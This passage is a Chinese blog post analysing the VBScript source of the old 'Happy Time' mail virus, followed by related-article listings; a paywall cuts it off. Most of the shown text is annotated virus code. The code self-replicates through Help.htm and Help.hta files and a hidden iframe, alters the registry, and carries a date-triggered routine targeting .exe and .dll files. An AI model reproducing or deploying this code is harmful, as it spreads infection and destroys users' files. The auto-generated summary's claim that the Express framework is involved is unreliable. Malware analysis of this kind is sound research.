欢乐时光病毒原码分析

最新推荐文章于 2024-10-23 21:36:41 发布
最新推荐文章于 2024-10-23 21:36:41 发布
阅读量2.7k 收藏 2
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 安全技术 文章标签: function vbscript each shell html express
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/PingPingPangPang/article/details/11281
本文深入探讨了欢乐时光病毒的源码,分析了其使用VBScript编程语言的关键函数,揭示了它如何通过HTML和Shell交互来传播。同时,文章还涉及了Express框架在病毒行为中的潜在应用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

 

 

本贴内容只用于研究,请看到者帮助他人删除windows的VBS脚本语言,该语言是 重大安全漏洞!!!!!!
> <!--
> <script language='VBScript'>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> Rem I am sorry! happy time
> On Error Resume Next
> mload                                ----------------------从mload开始罪恶的历程
> Sub mload()                                 
> On Error Resume Next
> mPath = Grf()
> Set Os = CreateObject("Scriptlet.TypeLib")
> Set Oh = CreateObject("Shell.Application")
> If IsHTML Then                        ----------------------如果本程序是网页,就是在Outlook
> mURL = LCase(document.Location)
> If mPath = "" Then
> Os.Reset
> Os.Path = "C:/Help.htm"               ----------------------建立help.htm
> Os.Doc = Lhtml()                      ------------调入全部源码
> Os.Write()                            ----------------------存储自身到help.htm
> Ihtml = "<span style='position:absolute'><Iframe src='C:/Help.htm' width='0' height='0'></Iframe></span>"
> Call document.Body.insertAdjacentHTML("AfterBegin", Ihtml)
> Else
> If Iv(mPath, "Help.vbs") Then    
> setInterval "Rt()", 10000
> Else
> m = "hta"
> If LCase(m) = Right(mURL, Len(m)) Then
> id = setTimeout("mclose()", 1)       ---------调用mclose
> main                                ----------------进入主程序
> Else
> Os.Reset()
> Os.Path = mPath & "/" & "Help.hta"        ------------建立Help.hta文件
> Os.Doc = Lhtml()
> Os.write()
> Iv mPath, "Help.hta"
> End If
> End If
> End If
> Else
> main      
> End If
> End Sub
> Sub main()                                      ----------------主程序
> On Error Resume Next
> Set Of = CreateObject("Scripting.FileSystemObject")
> Set Od = CreateObject("Scripting.Dictionary")
> Od.Add "html", "1100"
> Od.Add "vbs", "0100"
> Od.Add "htm", "1100"
> Od.Add "asp", "0010"
> Ks = "HKEY_CURRENT_USER/Software/"              -----------------写注册表
> Ds = Grf()
> Cs = Gsf()
> If IsVbs Then
> If Of.FileExists("C:/help.htm") Then
> Of.DeleteFile ("C:/help.htm")
> End If
> Key = CInt(Month(Date) + Day(Date))             ---------------注意:破坏动作
> If Key = 13 Then                                ---------------如果月日之和等于13
> Od.RemoveAll
> Od.Add "exe", "0001"                            ---------------删除.exe.dll文件
> Od.Add "dll", "0001"
> End If
> Cn = Rg(Ks & "Help/Count")                      ------------修改注册表的计数器
> If Cn = "" Then
> Cn = 1
> End If
> Rw Ks & "Help/Count", Cn + 1
> f1 = Rg(Ks & "Help/FileName")
> f2 = FN
最低0.47元/天 解锁文章

200万优质内容无限畅学
软件设计师之上午选择题(一)
Hissz的博客
07-13 759
软考之软件设计师上午选择题
[转]“新欢乐时光病毒源代码分析
代码人生
09-21 2511
Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk Sub KJ_start() 初始化变量 KJSetDim() 初始化环境 KJCreateMilieu() 感染本地或者共享上与html所在目录 KJLikeIt() 通过vbs感染Outlook邮件模板
浅析欢乐时光(HAPPY TIME)病毒 (转)
circularr9834的博客
08-16 379
浅析欢乐时光(HAPPY TIME)病毒 (转)[@more@]浅析欢乐时光(HAPPY TIME)病毒徐广圻 01-5-11 下午 02:19:25 本人是个上网新手,今年四月份左右才开始上网。新手嘛,可不像高手那样,懂...
[分析]欢乐时光源码
11-16 1433
 啥都不说了。自己看,关于这个病毒在03年的时候大家应该被¥%……#·过。这是源代码.欢乐时光源码‘*************** 欢乐时光 *************** Rem I am sorry! happy time On Error Resume Next Mload ‘以上为病毒入口,并加上I am sorry! happy time的注释,以表明此文件已被感染过。 Sub
软件设计师近10年上午真题解析知识点(并非绝对完整版)
qq_44858224的博客
10-31 2740
2009下半年 计算机硬件组成 1、CPU是计算机的控制中心,它的组成部分:运算器、控制器、寄存器组和内部总线 2、控制器用于协调和指挥整个计算机系统,它的组成部分:程序计数器(PC)、指令寄存器、指令译码器、时序产生器和操作控制器 3、程序寄存器是专用寄存器,具备寄存信息和技术两种功能 指令系统和计算机体系结构 4、CISC(复杂指令集计算机):进一步增强原有指令的功能,用更为复杂的新指令取代原先由软件子程序完成的功能,实现软件功能的硬件化,导致机器的指令系统越来越庞大而复杂 5、RISC(精简指令集计算
软考-计算机组成与结构
最新发布
yyj888999的博客
10-23 1006
个人软考备考中涉及到的计算机组成相关内容总结,包含了计算机可靠性指标、处理机、防火墙、网络攻击、计算机病毒分类
浅析欢乐时光(HAPPY TIME)病毒
tchaikov的专栏
05-13 5832
浅析欢乐时光(HAPPY TIME)病毒徐广圻 01-5-11 下午 02:19:25本人是个上网新手,今年四月份左右才开始上网。新手嘛,可不像高手那样,懂得如何使自己的电脑免受网络病毒之害,只使了个瑞星杀毒软件,以为如此一来就万事大吉了。刚开始上网时,简直在五光十色的各网站及信息的海洋中迷了路,东走西瞧,看见感兴趣的网页就保存,遇见有趣的软件即下载
脚本病毒分析:新欢乐时光
01-21
本文章整体论述了脚本病毒的概念,特点及防治方法,并结合新欢乐时光病毒进行分析
happytimesoft-onvif-client官网源码编译
12-26
happytimesoft-onvif-client官网源码编译,自提
happytime-rtsp-h264-data-pusher-example_HAPPYTIME_rtsp_
09-29
happytime rtsp h264 push example.
Happytime Onvif Server
12-12
Happytime ONVIF Server是一个NVT设备仿真程序。 全面支持ONVIF标准,实现了发现,设备和媒体服务。 用C写的,跨平台的支持库,可以方便地移植到嵌入式系统中。 可以用来开发NVT设备,为嵌入式开发人员可以更轻松地在PC上调试。 主要特点: 全面支持ONVIF标准 跨平台的支持库 不要依赖于任何第三方库 编译后的目标文件更小 提供源代码下载
ONVIF客户端软件2014happytime
02-15
ONVIF 软件客户端,经测试,能够接入符合ONVIF协议的相机
欢乐时光病毒专杀或folder.htt 专杀
02-12
欢乐时光病毒专杀 里面有2个杀毒软件 本人用了 好使 不好使 可以联系我 我给杀掉 欢乐时光病毒特征 :folder.htt 等文件夹
CIH病毒原码
ylfnd的专栏
07-22 952
CIH病毒原码文章属性:转载文章提交:xundi (xundi_at_xfocus.org); * The Virus Program Information * ; **************************************************************************** ; * * ; * Designer : CIH Original P
"欢乐时光"代码分析
jjdelphi的专栏
07-20 2697
"欢乐时光"代码分析 转自 ==================== “欢乐时光”其实就是利用了超文本邮件中可以夹带脚本语言的特点而棋高一招的。我们知道,邮件的格式可以有两种:纯文本和超文本。超文本(HTML)功能强大就不用多说了,它可以内嵌数种脚本语言,常见的就是VBScript和JavaScript。“欢乐时光”在超文本中夹带的就是VBS。从源代码中可以看得出来,该作者很可能是
happytime-onvif-server端测试软件
12-23
happytime-onvif-server端测试软件,在device test tool中可以搜到设备
欢乐时光
yanghaizi123的专栏
09-15 296
中毒了,叫“欢乐时光”。是一种早期的dos病毒,它会让系统变慢或打不开文件夹。所有的杀毒软件都不查杀他们。清除办法就是:搜索---全部删除。顺便把Thumbs.db也搜索出来,全部清除。“欢乐时光”最容易软盘传播或者u盘传播。请检查你常用的机器,全部删除。 删除后系统会变快,没有不良影响!!!! desktop.ini 是系统配置文件,如果你用的是茄花园的XP系统,肯定就是自定义的硬盘图表,文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值